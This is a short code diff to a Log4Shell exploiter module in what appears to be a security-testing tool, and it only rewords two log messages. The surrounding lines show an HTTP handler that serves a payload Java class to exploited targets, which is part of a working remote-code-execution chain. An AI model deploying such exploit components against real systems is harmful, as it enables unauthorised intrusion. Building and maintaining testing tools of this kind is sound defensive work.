diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index d3dc9d351..c4ef8c3dd 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -125,11 +125,11 @@ class Log4ShellExploiter(WebRCE): stop = False def do_GET(self): - logger.error("Got a get request!") + logger.info("Java class servergot a GET request!") self.send_response(200) self.send_header("Content-type", "application/octet-stream") self.end_headers() - logger.info("Sending payload class!") + logger.info("Sending the payload class!") self.wfile.write(self.java_class) Log4ShellExploiter.HTTPHandler.class_downloaded = True